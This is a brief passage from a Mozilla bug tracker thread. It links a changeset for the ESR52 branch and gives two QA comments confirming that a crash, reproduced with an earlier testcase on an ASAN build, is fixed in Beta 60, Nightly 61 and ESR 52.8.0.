[Ryan VanderMeulen [:RyanVM]]

https://hg.mozilla.org/releases/mozilla-esr52/rev/05cadfa3ac390eba43a9b0011544a3bd24cfb0ce

Comment 22

[Ciprian Georgiu, Desktop QA]

I've managed to reproduce this crash using the testcase from comment 2, on an affected ASAN Nightly build (61.01, 20180326091918).

This is verified fixed on the latest ASAN builds: Beta 60.0b10 (20180405001308), Nightly 61.0a1 (20180405001308) running Ubuntu 16.04 x64.

Ni myself to verify this on esr 52.8.0 as well.

Comment 23

[Ciprian Georgiu, Desktop QA]

This crash is also verified fixed on 52.8.0esr (20180429211418) ASAN build, under Ubuntu 16.04 x64.